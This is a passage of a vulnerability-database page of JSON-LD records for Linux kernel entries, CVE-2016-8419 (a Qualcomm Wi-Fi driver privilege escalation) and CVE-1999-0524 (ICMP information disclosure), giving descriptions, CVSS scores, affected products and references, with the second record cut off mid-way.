Type a vendor name or a vulnerability id.



All the vulnerabilites related to Linux - kernel
var-201702-0113
Vulnerability from variot

An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-32454494. References: QC-CR#1087209. Qualcomm Wi-Fi The driver contains a privilege escalation vulnerability. GoogleNexus/Pixel is a Google smartphone from the United States. Google Nexus/ Pixel products are prone to multiple privilege-escalation vulnerabilities. These issues are being tracked by Android Bug IDs A-32402310, A-32402604, A-32450647, A-32454494, A-32451171, A-32451104, A-33252788, A-32872662, A-32871330, A-32877494 and A-32879283

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201702-0113",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "android",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "android",
        "scope": null,
        "trust": 0.8,
        "vendor": "google",
        "version": null
      },
      {
        "model": "android app fakeid",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "pixel",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "pixel xl",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01580"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007338"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-331"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:google:android:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "7.1.1",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8419"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Hao Chen and Guang Gong of Alpha Team, Qihoo 360 Technology Co. Ltd",
    "sources": [
      {
        "db": "BID",
        "id": "96047"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2016-8419",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2016-8419",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "id": "CNVD-2017-01580",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.0,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-8419",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-8419",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-01580",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201702-331",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-8419",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01580"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8419"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007338"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-331"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-32454494. References: QC-CR#1087209. Qualcomm Wi-Fi The driver contains a privilege escalation vulnerability. GoogleNexus/Pixel is a Google smartphone from the United States. Google Nexus/ Pixel products are prone to multiple privilege-escalation vulnerabilities. \nThese issues are being tracked by Android Bug IDs A-32402310, A-32402604, A-32450647, A-32454494, A-32451171, A-32451104, A-33252788, A-32872662, A-32871330, A-32877494 and A-32879283",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-8419"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007338"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01580"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8419"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-8419",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "96047",
        "trust": 2.0
      },
      {
        "db": "SECTRACK",
        "id": "1037798",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007338",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01580",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-331",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8419",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01580"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8419"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007338"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-331"
      }
    ]
  },
  "id": "VAR-201702-0113",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01580"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01580"
      }
    ]
  },
  "last_update_date": "2023-12-18T11:08:43.523000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-February 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for QualcommWi-FiDriver Privilege Escalation Vulnerability (CNVD-2017-01580) for GoogleNexus/Pixel Products",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/89406"
      },
      {
        "title": "Android Qualcomm Wi-Fi Fixes for driver permission and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67615"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014February 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=861656f01e3e18209f39ad844e9ee35d"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01580"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8419"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007338"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-331"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-264",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007338"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8419"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.1,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/bid/96047"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1037798"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8419"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-8419"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/264.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01580"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8419"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007338"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-331"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01580"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8419"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007338"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8419"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-331"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01580"
      },
      {
        "date": "2017-02-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8419"
      },
      {
        "date": "2017-02-07T00:00:00",
        "db": "BID",
        "id": "96047"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-007338"
      },
      {
        "date": "2017-02-08T15:59:00.393000",
        "db": "NVD",
        "id": "CVE-2016-8419"
      },
      {
        "date": "2017-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-331"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-20T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01580"
      },
      {
        "date": "2017-07-25T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8419"
      },
      {
        "date": "2017-03-07T00:02:00",
        "db": "BID",
        "id": "96047"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-007338"
      },
      {
        "date": "2017-07-25T01:29:03.060000",
        "db": "NVD",
        "id": "CVE-2016-8419"
      },
      {
        "date": "2017-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-331"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-331"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Qualcomm Wi-Fi Elevation of privilege vulnerability in driver",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-007338"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-331"
      }
    ],
    "trust": 0.6
  }
}

var-199708-0008
Vulnerability from variot

ICMP information such as (1) netmask and (2) timestamp is allowed from arbitrary hosts. McAfee Data Loss Prevention (DLP) is a set of data loss prevention solutions from McAfee. The solution protects intellectual property and ensures compliance by protecting the environment in which sensitive data resides (on-premise, in the cloud, or on the endpoint). Cross-site scripting vulnerabilities and cross-site request forgery vulnerabilities exist in McAfee DLP. When the user browses the affected website, his browser will execute any script code provided by the attacker, which may cause the attacker to steal cookie-based authentication, perform unauthorized operations, leak or modify sensitive information, or other forms may exist. s attack. Other attacks may also be possible

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-199708-0008",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "netware",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "novell",
        "version": null
      },
      {
        "model": "macos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": null
      },
      {
        "model": "windows",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "irix",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sgi",
        "version": null
      },
      {
        "model": "os2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "bsdos",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "windriver",
        "version": null
      },
      {
        "model": "tru64",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "unix",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sco",
        "version": null
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": null
      },
      {
        "model": "mac os x",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "apple",
        "version": null
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.6,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "network data loss prevention",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.2.2"
      },
      {
        "model": "network data loss prevention",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.2.1"
      },
      {
        "model": "network data loss prevention",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.2.0"
      },
      {
        "model": "network data loss prevention",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "8.6"
      },
      {
        "model": "network data loss prevention",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.3"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "61811"
      },
      {
        "db": "NVD",
        "id": "CVE-1999-0524"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-199708-003"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:cisco:ios:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:hp-ux:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:ibm:aix:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:oracle:solaris:-:*:*:*:*:*:-:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:novell:netware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:windriver:bsdos:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:ibm:os2:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:hp:tru64:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:sco:sco_unix:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:sgi:irix:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-1999-0524"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "ANZ Bank, BAE Systems, Graham Bell of Stratsec.Detica, Jamie Ooi, DirecTV, Xylinx, and Telstra",
    "sources": [
      {
        "db": "BID",
        "id": "61811"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201308-265"
      }
    ],
    "trust": 0.9
  },
  "cve": "CVE-1999-0524",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 2.1,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "LOW",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "LOCAL",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "NONE",
            "baseScore": 0.0,
